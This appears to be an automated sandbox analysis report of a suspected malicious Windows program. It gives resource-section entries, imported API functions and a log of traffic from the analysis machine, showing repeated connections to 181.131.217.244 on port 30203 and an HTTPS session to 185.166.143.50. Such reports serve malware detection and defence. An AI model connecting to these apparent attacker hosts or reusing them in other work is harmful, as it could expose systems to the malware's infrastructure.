                                                                                                                      RT_STRING0x18a0940x328data0.34405940594059403
                                                                                                                      RT_STRING0x18a3bc0x328dataEnglishCanada0.34405940594059403
                                                                                                                      RT_STRING0x18a6e40x70dataChineseTaiwan0.625
                                                                                                                      RT_STRING0x18a7540x70dataCzechCzech Republic0.625
                                                                                                                      RT_STRING0x18a7c40x70dataDanishDenmark0.625
                                                                                                                      RT_STRING0x18a8340x70dataGermanGermany0.625
                                                                                                                      RT_STRING0x18a8a40x70dataGreekGreece0.625
                                                                                                                      RT_STRING0x18a9140x70dataFinnishFinland0.625
                                                                                                                      RT_STRING0x18a9840x70dataFrenchFrance0.625
                                                                                                                      RT_STRING0x18a9f40x70dataHebrewIsrael0.625
                                                                                                                      RT_STRING0x18aa640x70dataHungarianHungary0.625
                                                                                                                      RT_STRING0x18aad40x70dataItalianItaly0.625
                                                                                                                      RT_STRING0x18ab440x70dataJapaneseJapan0.625
                                                                                                                      RT_STRING0x18abb40x70dataKoreanNorth Korea0.625
                                                                                                                      RT_STRING0x18abb40x70dataKoreanSouth Korea0.625
                                                                                                                      RT_STRING0x18ac240x70dataDutchNetherlands0.625
                                                                                                                      RT_STRING0x18ac940x70dataNorwegianNorway0.625
                                                                                                                      RT_STRING0x18ad040x70dataPolishPoland0.625
                                                                                                                      RT_STRING0x18ad740x70dataPortugueseBrazil0.625
                                                                                                                      RT_STRING0x18ade40x70dataRussianRussia0.625
                                                                                                                      RT_STRING0x18ae540x70dataSwedishSweden0.625
                                                                                                                      RT_STRING0x18aec40x70dataThaiThailand0.625
                                                                                                                      RT_STRING0x18af340x70dataChineseChina0.625
                                                                                                                      RT_STRING0x18afa40x70dataPortuguesePortugal0.625
                                                                                                                      RT_STRING0x18b0140x70data0.625
                                                                                                                      RT_STRING0x18b0840x70dataEnglishCanada0.625
                                                                                                                      RT_STRING0x18b0f40x106dataChineseTaiwan0.5763358778625954
                                                                                                                      RT_STRING0x18b1fc0x106dataCzechCzech Republic0.5763358778625954
                                                                                                                      RT_STRING0x18b3040x106dataDanishDenmark0.5763358778625954
                                                                                                                      RT_STRING0x18b40c0x106dataGermanGermany0.5763358778625954
                                                                                                                      RT_STRING0x18b5140x106dataGreekGreece0.5763358778625954
                                                                                                                      RT_STRING0x18b61c0x106dataFinnishFinland0.5763358778625954
                                                                                                                      RT_STRING0x18b7240x106dataFrenchFrance0.5763358778625954
                                                                                                                      RT_STRING0x18b82c0x106dataHebrewIsrael0.5763358778625954
                                                                                                                      RT_STRING0x18b9340x106dataHungarianHungary0.5763358778625954
                                                                                                                      RT_STRING0x18ba3c0x106dataItalianItaly0.5763358778625954
                                                                                                                      RT_STRING0x18bb440x106dataJapaneseJapan0.5763358778625954
                                                                                                                      RT_STRING0x18bc4c0x106dataKoreanNorth Korea0.5763358778625954
                                                                                                                      RT_STRING0x18bc4c0x106dataKoreanSouth Korea0.5763358778625954
                                                                                                                      RT_STRING0x18bd540x106dataDutchNetherlands0.5763358778625954
                                                                                                                      RT_STRING0x18be5c0x106dataNorwegianNorway0.5763358778625954
                                                                                                                      RT_STRING0x18bf640x106dataPolishPoland0.5763358778625954
                                                                                                                      RT_STRING0x18c06c0x106dataPortugueseBrazil0.5763358778625954
                                                                                                                      RT_STRING0x18c1740x106dataRussianRussia0.5763358778625954
                                                                                                                      RT_STRING0x18c27c0x106dataSwedishSweden0.5763358778625954
                                                                                                                      RT_STRING0x18c3840x106dataThaiThailand0.5763358778625954
                                                                                                                      RT_STRING0x18c48c0x106dataChineseChina0.5763358778625954
                                                                                                                      RT_STRING0x18c5940x106dataPortuguesePortugal0.5763358778625954
                                                                                                                      RT_STRING0x18c69c0x106data0.5763358778625954
                                                                                                                      RT_STRING0x18c7a40x106dataEnglishCanada0.5763358778625954
                                                                                                                      RT_STRING0x18c8ac0xdadataChineseTaiwan0.43119266055045874
                                                                                                                      RT_STRING0x18c9880xdadataCzechCzech Republic0.43119266055045874
                                                                                                                      RT_STRING0x18ca640xdadataDanishDenmark0.43119266055045874
                                                                                                                      RT_STRING0x18cb400xdadataGermanGermany0.43119266055045874
                                                                                                                      RT_STRING0x18cc1c0xdadataGreekGreece0.43119266055045874
                                                                                                                      RT_STRING0x18ccf80xdadataFinnishFinland0.43119266055045874
                                                                                                                      RT_STRING0x18cdd40xdadataFrenchFrance0.43119266055045874
                                                                                                                      RT_STRING0x18ceb00xdadataHebrewIsrael0.43119266055045874
                                                                                                                      RT_STRING0x18cf8c0xdadataHungarianHungary0.43119266055045874
                                                                                                                      RT_STRING0x18d0680xdadataItalianItaly0.43119266055045874
                                                                                                                      RT_STRING0x18d1440xdadataJapaneseJapan0.43119266055045874
                                                                                                                      RT_STRING0x18d2200xdadataKoreanNorth Korea0.43119266055045874
                                                                                                                      RT_STRING0x18d2200xdadataKoreanSouth Korea0.43119266055045874
                                                                                                                      RT_STRING0x18d2fc0xdadataDutchNetherlands0.43119266055045874
                                                                                                                      RT_STRING0x18d3d80xdadataNorwegianNorway0.43119266055045874
                                                                                                                      RT_STRING0x18d4b40xdadataPolishPoland0.43119266055045874
                                                                                                                      RT_STRING0x18d5900xdadataPortugueseBrazil0.43119266055045874
                                                                                                                      RT_STRING0x18d66c0xdadataRussianRussia0.43119266055045874
                                                                                                                      RT_STRING0x18d7480xdadataSwedishSweden0.43119266055045874
                                                                                                                      RT_STRING0x18d8240xdadataThaiThailand0.43119266055045874
                                                                                                                      RT_STRING0x18d9000xdadataChineseChina0.43119266055045874
                                                                                                                      RT_STRING0x18d9dc0xdadataPortuguesePortugal0.43119266055045874
                                                                                                                      RT_STRING0x18dab80xdadata0.43119266055045874
                                                                                                                      RT_STRING0x18db940xdadataEnglishCanada0.43119266055045874
                                                                                                                      RT_STRING0x18dc700x46dataChineseTaiwan0.7428571428571429
                                                                                                                      RT_STRING0x18dcb80x46dataCzechCzech Republic0.7428571428571429
                                                                                                                      RT_STRING0x18dd000x46dataDanishDenmark0.7428571428571429
                                                                                                                      RT_STRING0x18dd480x46dataGermanGermany0.7428571428571429
                                                                                                                      RT_STRING0x18dd900x46dataGreekGreece0.7428571428571429
                                                                                                                      RT_STRING0x18ddd80x46dataFinnishFinland0.7428571428571429
                                                                                                                      RT_STRING0x18de200x46dataFrenchFrance0.7428571428571429
                                                                                                                      RT_STRING0x18de680x46dataHebrewIsrael0.7428571428571429
                                                                                                                      RT_STRING0x18deb00x46dataHungarianHungary0.7428571428571429
                                                                                                                      RT_STRING0x18def80x46dataItalianItaly0.7428571428571429
                                                                                                                      RT_STRING0x18df400x46dataJapaneseJapan0.7428571428571429
                                                                                                                      RT_STRING0x18df880x46dataKoreanNorth Korea0.7428571428571429
                                                                                                                      RT_STRING0x18df880x46dataKoreanSouth Korea0.7428571428571429
                                                                                                                      RT_STRING0x18dfd00x46dataDutchNetherlands0.7428571428571429
                                                                                                                      RT_STRING0x18e0180x46dataNorwegianNorway0.7428571428571429
                                                                                                                      RT_STRING0x18e0600x46dataPolishPoland0.7428571428571429
                                                                                                                      RT_STRING0x18e0a80x46dataPortugueseBrazil0.7428571428571429
                                                                                                                      RT_STRING0x18e0f00x46dataRussianRussia0.7428571428571429
                                                                                                                      RT_STRING0x18e1380x46dataSwedishSweden0.7428571428571429
                                                                                                                      RT_STRING0x18e1800x46dataThaiThailand0.7428571428571429
                                                                                                                      RT_STRING0x18e1c80x46dataChineseChina0.7428571428571429
                                                                                                                      RT_STRING0x18e2100x46dataPortuguesePortugal0.7428571428571429
                                                                                                                      RT_STRING0x18e2580x46data0.7428571428571429
                                                                                                                      RT_STRING0x18e2a00x46dataEnglishCanada0.7428571428571429
                                                                                                                      RT_STRING0x18e2e80x1f8dataChineseTaiwan0.36706349206349204
                                                                                                                      RT_STRING0x18e4e00x1f8dataCzechCzech Republic0.36706349206349204
                                                                                                                      RT_STRING0x18e6d80x1f8dataDanishDenmark0.36706349206349204
                                                                                                                      RT_STRING0x18e8d00x1f8dataGermanGermany0.36706349206349204
                                                                                                                      RT_STRING0x18eac80x1f8dataGreekGreece0.36706349206349204
                                                                                                                      RT_STRING0x18ecc00x1f8dataFinnishFinland0.36706349206349204
                                                                                                                      RT_STRING0x18eeb80x1f8dataFrenchFrance0.36706349206349204
                                                                                                                      RT_STRING0x18f0b00x1f8dataHebrewIsrael0.36706349206349204
                                                                                                                      RT_STRING0x18f2a80x1f8dataHungarianHungary0.36706349206349204
                                                                                                                      RT_STRING0x18f4a00x1f8dataItalianItaly0.36706349206349204
                                                                                                                      RT_STRING0x18f6980x1f8dataJapaneseJapan0.36706349206349204
                                                                                                                      RT_STRING0x18f8900x1f8dataKoreanNorth Korea0.36706349206349204
                                                                                                                      RT_STRING0x18f8900x1f8dataKoreanSouth Korea0.36706349206349204
                                                                                                                      RT_STRING0x18fa880x1f8dataDutchNetherlands0.36706349206349204
                                                                                                                      RT_STRING0x18fc800x1f8dataNorwegianNorway0.36706349206349204
                                                                                                                      RT_STRING0x18fe780x1f8dataPolishPoland0.36706349206349204
                                                                                                                      RT_STRING0x1900700x1f8dataPortugueseBrazil0.36706349206349204
                                                                                                                      RT_STRING0x1902680x1f8dataRussianRussia0.36706349206349204
                                                                                                                      RT_STRING0x1904600x1f8dataSwedishSweden0.36706349206349204
                                                                                                                      RT_STRING0x1906580x1f8dataThaiThailand0.36706349206349204
                                                                                                                      RT_STRING0x1908500x1f8dataChineseChina0.36706349206349204
                                                                                                                      RT_STRING0x190a480x1f8dataPortuguesePortugal0.36706349206349204
                                                                                                                      RT_STRING0x190c400x1f8data0.36706349206349204
                                                                                                                      RT_STRING0x190e380x1f8dataEnglishCanada0.36706349206349204
                                                                                                                      RT_STRING0x1910300x86dataChineseTaiwan0.6567164179104478
                                                                                                                      RT_STRING0x1910b80x86dataCzechCzech Republic0.6567164179104478
                                                                                                                      RT_STRING0x1911400x86dataDanishDenmark0.6567164179104478
                                                                                                                      RT_STRING0x1911c80x86dataGermanGermany0.6567164179104478
                                                                                                                      RT_STRING0x1912500x86dataGreekGreece0.6567164179104478
                                                                                                                      RT_STRING0x1912d80x86dataFinnishFinland0.6567164179104478
                                                                                                                      RT_STRING0x1913600x86dataFrenchFrance0.6567164179104478
                                                                                                                      RT_STRING0x1913e80x86dataHebrewIsrael0.6567164179104478
                                                                                                                      RT_STRING0x1914700x86dataHungarianHungary0.6567164179104478
                                                                                                                      RT_STRING0x1914f80x86dataItalianItaly0.6567164179104478
                                                                                                                      RT_STRING0x1915800x86dataJapaneseJapan0.6567164179104478
                                                                                                                      RT_STRING0x1916080x86dataKoreanNorth Korea0.6567164179104478
                                                                                                                      RT_STRING0x1916080x86dataKoreanSouth Korea0.6567164179104478
                                                                                                                      RT_STRING0x1916900x86dataDutchNetherlands0.6567164179104478
                                                                                                                      RT_STRING0x1917180x86dataNorwegianNorway0.6567164179104478
                                                                                                                      RT_STRING0x1917a00x86dataPolishPoland0.6567164179104478
                                                                                                                      RT_STRING0x1918280x86dataPortugueseBrazil0.6567164179104478
                                                                                                                      RT_STRING0x1918b00x86dataRussianRussia0.6567164179104478
                                                                                                                      RT_STRING0x1919380x86dataSwedishSweden0.6567164179104478
                                                                                                                      RT_STRING0x1919c00x86dataThaiThailand0.6567164179104478
                                                                                                                      RT_STRING0x191a480x86dataChineseChina0.6567164179104478
                                                                                                                      RT_STRING0x191ad00x86dataPortuguesePortugal0.6567164179104478
                                                                                                                      RT_STRING0x191b580x86data0.6567164179104478
                                                                                                                      RT_STRING0x191be00x86dataEnglishCanada0.6567164179104478
                                                                                                                      RT_STRING0x191c680x82StarOffice Gallery theme p, 536899072 objects, 1st nEnglishUnited States0.7153846153846154
                                                                                                                      RT_STRING0x191cec0x2adataEnglishUnited States0.5476190476190477
                                                                                                                      RT_STRING0x191d180x192dataEnglishUnited States0.48009950248756217
                                                                                                                      RT_STRING0x191eac0x4e2dataEnglishUnited States0.376
                                                                                                                      RT_STRING0x1923900x31adataEnglishUnited States0.2682619647355164
                                                                                                                      RT_STRING0x1926ac0x2dcdataEnglishUnited States0.36885245901639346
                                                                                                                      RT_STRING0x1929880x8adataEnglishUnited States0.6594202898550725
                                                                                                                      RT_STRING0x192a140xacdataEnglishUnited States0.45348837209302323
                                                                                                                      RT_STRING0x192ac00xdedataEnglishUnited States0.536036036036036
                                                                                                                      RT_STRING0x192ba00x4c4dataEnglishUnited States0.3221311475409836
                                                                                                                      RT_STRING0x1930640x264dataEnglishUnited States0.3741830065359477
                                                                                                                      RT_STRING0x1932c80x2cdataEnglishUnited States0.5227272727272727
                                                                                                                      RT_STRING0x1932f40x42dataEnglishUnited States0.6060606060606061
                                                                                                                      RT_ACCELERATOR0x1933380x50dataEnglishUnited States0.8
                                                                                                                      RT_RCDATA0x1933880x9c27aDelphi compiled form 'TdmMain'0.3199121339566298
                                                                                                                      RT_RCDATA0x22f6040x23e27Delphi compiled form 'TfLogin'0.2975582210187573
                                                                                                                      RT_MESSAGETABLE0x25342c0x2840data0.4204192546583851
                                                                                                                      RT_MESSAGETABLE0x255c6c0x2840data0.3144409937888199
                                                                                                                      RT_GROUP_CURSOR0x2584ac0x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                      RT_GROUP_CURSOR0x2584d00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x2584e40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x2584f80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x25850c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x2585200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x2585340x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x2585480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x25855c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x2585700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x2585840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x2585980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x2585ac0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x2585c00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x2585d40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_ICON0x2585e80x22dataEnglishUnited States1.0
                                                                                                                      RT_VERSION0x25860c0x32cdataEnglishUnited States0.4248768472906404
                                                                                                                      RT_ANIICON0x2589380x4e4a0PC bitmap, Windows 3.x format, 40938 x 2 x 38, image size 320770, cbSize 320672, bits offset 540.9413013920766391
                                                                                                                      DLLImport
                                                                                                                      KERNEL32.dllVirtualQuery, RtlUnwind, ExitProcess, TerminateProcess, GetStartupInfoA, GetCommandLineA, GetSystemTimeAsFileTime, SetEnvironmentVariableA, ExitThread, CreateThread, HeapReAlloc, SetStdHandle, GetFileType, HeapSize, HeapDestroy, HeapCreate, VirtualFree, IsBadWritePtr, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemInfo, GetStringTypeW, GetStdHandle, UnhandledExceptionFilter, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetTimeZoneInformation, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, IsValidCodePage, LCMapStringA, LCMapStringW, SetUnhandledExceptionFilter, IsBadReadPtr, IsBadCodePtr, GetLocaleInfoW, VirtualAlloc, VirtualProtect, HeapFree, HeapAlloc, FileTimeToSystemTime, GetOEMCP, GetCPInfo, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, TlsGetValue, EnterCriticalSection, GlobalHandle, GlobalReAlloc, LeaveCriticalSection, InterlockedIncrement, WritePrivateProfileStringA, GlobalFlags, DeleteCriticalSection, InitializeCriticalSection, RaiseException, GetFullPathNameA, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, InterlockedDecrement, GlobalGetAtomNameA, GlobalFindAtomA, lstrcatA, lstrcmpW, WaitForSingleObject, ResumeThread, GlobalAddAtomA, MulDiv, lstrcpynA, GetCurrentThreadId, GlobalAlloc, GlobalDeleteAtom, lstrcmpA, GetModuleFileNameA, ConvertDefaultLocale, EnumResourceLanguagesA, lstrcpyA, GlobalLock, GlobalUnlock, GlobalFree, FreeResource, GetThreadLocale, GetLocaleInfoA, GetACP, CreateFileA, GetFileTime, DosDateTimeToFileTime, LocalFileTimeToFileTime, SetFileTime, FileTimeToLocalFileTime, SetErrorMode, CreateDirectoryA, RemoveDirectoryA, CreateProcessA, GetExitCodeProcess, GetSystemDirectoryA, GetWindowsDirectoryA, GetTempPathA, LocalAlloc, GetCurrentProcess, GetVersionExA, GetCurrentThread, SetThreadPriority, GetLogicalDrives, GetDriveTypeA, GetShortPathNameA, FormatMessageA, LocalFree, GetDiskFreeSpaceA, SetLastError, GetVolumeInformationA, GetUserDefaultLangID, DeleteFileA, CopyFileA, SetFileAttributesA, GetFileAttributesA, FindFirstFileA, FindNextFileA, FindClose, FindResourceExA, CreateToolhelp32Snapshot, Process32First, Process32Next, CloseHandle, SetCurrentDirectoryA, GetModuleHandleA, GetCurrentDirectoryA, LoadLibraryA, GetProcAddress, FreeLibrary, Sleep, FindResourceA, LoadResource, LockResource, SizeofResource, CompareStringW, CompareStringA, lstrlenA, lstrcmpiA, GetVersion, GetLastError, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeA, InterlockedExchange
                                                                                                                      USER32.dllGetMenuItemInfoA, InflateRect, GetSysColorBrush, LoadMenuA, DestroyMenu, UnpackDDElParam, ReuseDDElParam, ReleaseCapture, LoadAcceleratorsA, InvalidateRect, InsertMenuItemA, CreatePopupMenu, SetRectEmpty, BringWindowToTop, SetMenu, TranslateAcceleratorA, EndPaint, BeginPaint, GetWindowDC, ReleaseDC, GetDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, FillRect, RegisterWindowMessageA, WinHelpA, GetCapture, CreateWindowExA, GetClassLongA, GetClassInfoExA, GetClassNameA, SetPropA, GetPropA, RemovePropA, GetForegroundWindow, BeginDeferWindowPos, EndDeferWindowPos, GetTopWindow, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, LoadIconA, MapWindowPoints, TrackPopupMenu, SetForegroundWindow, UpdateWindow, GetClientRect, GetMenu, GetSysColor, ScreenToClient, EqualRect, DeferWindowPos, GetClassInfoA, RegisterClassA, UnregisterClassA, CallWindowProcA, OffsetRect, IntersectRect, IsIconic, GetWindowPlacement, GetWindowRect, CopyRect, PtInRect, GetWindow, GetWindowTextA, SetWindowPos, SetFocus, ShowWindow, SetWindowLongA, GetDlgCtrlID, SetWindowTextA, IsDialogMessageA, SendDlgItemMessageA, SetMenuItemBitmaps, GetFocus, ModifyMenuA, EnableMenuItem, CheckMenuItem, GetMenuCheckMarkDimensions, LoadBitmapA, SetWindowsHookExA, CallNextHookEx, GetMessageA, IsWindowVisible, GetKeyState, GetCursorPos, ValidateRect, GetLastActivePopup, ShowOwnedPopups, SetCursor, GetMenuState, GetMenuItemID, GetMenuItemCount, GetSubMenu, PostMessageA, PostQuitMessage, GetDesktopWindow, GetActiveWindow, SetActiveWindow, GetSystemMetrics, CreateDialogIndirectParamA, AdjustWindowRectEx, DestroyWindow, IsWindow, GetWindowLongA, GetDlgItem, IsWindowEnabled, GetParent, GetNextDlgTabItem, SendMessageA, EndDialog, PeekMessageA, TranslateMessage, DispatchMessageA, wsprintfA, ExitWindowsEx, SystemParametersInfoA, DefWindowProcA, LoadImageA, MessageBoxA, LoadCursorA, EnableWindow, CharUpperA
                                                                                                                      GDI32.dllTextOutA, RectVisible, PtVisible, BitBlt, DeleteObject, CreateFontIndirectA, GetTextExtentPoint32A, CreateCompatibleBitmap, CreateSolidBrush, GetStockObject, CreateCompatibleDC, CreatePatternBrush, DeleteDC, ScaleWindowExtEx, SetWindowExtEx, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, GetPixel, GetDeviceCaps, SetMapMode, SetBkMode, RestoreDC, SaveDC, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateBitmap, ExtTextOutA
                                                                                                                      comdlg32.dllGetFileTitleA
                                                                                                                      WINSPOOL.DRVOpenPrinterA, DocumentPropertiesA, ClosePrinter
                                                                                                                      ADVAPI32.dllRegEnumKeyExA, LookupPrivilegeValueA, OpenProcessToken, FreeSid, RevertToSelf, AccessCheck, IsValidSecurityDescriptor, SetSecurityDescriptorOwner, SetSecurityDescriptorGroup, SetSecurityDescriptorDacl, AddAccessAllowedAce, RegQueryValueA, RegEnumKeyA, RegOpenKeyA, RegCreateKeyExA, RegSetValueExA, AdjustTokenPrivileges, RegDeleteKeyA, RegQueryValueExA, RegCloseKey, RegOpenKeyExA, ImpersonateSelf, OpenThreadToken, AllocateAndInitializeSid, InitializeSecurityDescriptor, GetLengthSid, InitializeAcl
                                                                                                                      SHELL32.dllDragFinish, DragQueryFileA, ShellExecuteA
                                                                                                                      COMCTL32.dllImageList_Draw, ImageList_GetImageInfo, ImageList_Destroy
                                                                                                                      SHLWAPI.dllPathFindFileNameA, PathStripToRootA, PathFindExtensionA, PathIsUNCA
                                                                                                                      ole32.dllCoUninitialize, CoCreateInstance, CoInitialize
                                                                                                                      OLEAUT32.dllVariantClear, VariantInit, VariantChangeType
                                                                                                                      VERSION.dllGetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                      EnglishUnited States
                                                                                                                      ChineseTaiwan
                                                                                                                      CzechCzech Republic
                                                                                                                      DanishDenmark
                                                                                                                      GermanGermany
                                                                                                                      GreekGreece
                                                                                                                      FinnishFinland
                                                                                                                      FrenchFrance
                                                                                                                      HebrewIsrael
                                                                                                                      HungarianHungary
                                                                                                                      ItalianItaly
                                                                                                                      JapaneseJapan
                                                                                                                      KoreanNorth Korea
                                                                                                                      KoreanSouth Korea
                                                                                                                      DutchNetherlands
                                                                                                                      NorwegianNorway
                                                                                                                      PolishPoland
                                                                                                                      PortugueseBrazil
                                                                                                                      RussianRussia
                                                                                                                      SwedishSweden
                                                                                                                      ThaiThailand
                                                                                                                      ChineseChina
                                                                                                                      PortuguesePortugal
                                                                                                                      EnglishCanada
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 12, 2024 17:30:35.507353067 CET4976230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:35.627156019 CET3020349762181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:35.627264977 CET4976230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:35.700952053 CET4976230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:35.820714951 CET3020349762181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:35.820842981 CET4976230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:35.940612078 CET3020349762181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:36.965740919 CET3020349762181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:37.015716076 CET4976230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:37.420454025 CET3020349762181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:37.450475931 CET4976230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:37.571305990 CET3020349762181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:37.571388960 CET4976230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:37.848197937 CET49768443192.168.2.10185.166.143.50
                                                                                                                      Dec 12, 2024 17:30:37.848238945 CET44349768185.166.143.50192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:37.852826118 CET49768443192.168.2.10185.166.143.50
                                                                                                                      Dec 12, 2024 17:30:37.904201031 CET49768443192.168.2.10185.166.143.50
                                                                                                                      Dec 12, 2024 17:30:37.904217005 CET44349768185.166.143.50192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:39.296190977 CET44349768185.166.143.50192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:39.296274900 CET49768443192.168.2.10185.166.143.50
                                                                                                                      Dec 12, 2024 17:30:39.300417900 CET49768443192.168.2.10185.166.143.50
                                                                                                                      Dec 12, 2024 17:30:39.300427914 CET44349768185.166.143.50192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:39.300908089 CET44349768185.166.143.50192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:39.343851089 CET49768443192.168.2.10185.166.143.50
                                                                                                                      Dec 12, 2024 17:30:39.357774973 CET49768443192.168.2.10185.166.143.50
                                                                                                                      Dec 12, 2024 17:30:39.399334908 CET44349768185.166.143.50192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:39.978401899 CET44349768185.166.143.50192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:39.978468895 CET44349768185.166.143.50192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:39.978527069 CET49768443192.168.2.10185.166.143.50
                                                                                                                      Dec 12, 2024 17:30:39.978554964 CET44349768185.166.143.50192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:39.978573084 CET49768443192.168.2.10185.166.143.50
                                                                                                                      Dec 12, 2024 17:30:39.978612900 CET44349768185.166.143.50192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:39.978656054 CET49768443192.168.2.10185.166.143.50
                                                                                                                      Dec 12, 2024 17:30:39.996891022 CET49768443192.168.2.10185.166.143.50
                                                                                                                      Dec 12, 2024 17:30:40.643507957 CET4977530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:40.763228893 CET3020349775181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:40.763349056 CET4977530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:40.764137030 CET4977530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:40.884790897 CET3020349775181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:40.884897947 CET4977530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:41.006247997 CET3020349775181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:42.104195118 CET3020349775181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:42.104289055 CET4977530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:42.105246067 CET4977530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:42.219811916 CET4978030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:42.226888895 CET3020349775181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:42.341115952 CET3020349780181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:42.344166994 CET4978030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:42.345722914 CET4978030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:42.465722084 CET3020349780181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:42.465795040 CET4978030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:42.586180925 CET3020349780181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:43.642164946 CET3020349780181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:43.642263889 CET4978030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:43.642501116 CET4978030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:43.751960039 CET4978530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:43.763468981 CET3020349780181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:43.872354031 CET3020349785181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:43.872442961 CET4978530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:43.873792887 CET4978530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:43.993865013 CET3020349785181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:43.994256973 CET4978530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:44.114617109 CET3020349785181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:45.231400013 CET3020349785181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:30:45.231996059 CET4978530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:45.232148886 CET4978530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:45.346918106 CET4978930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:30:45.351845980 CET3020349785181.131.217.244192.168.2.10
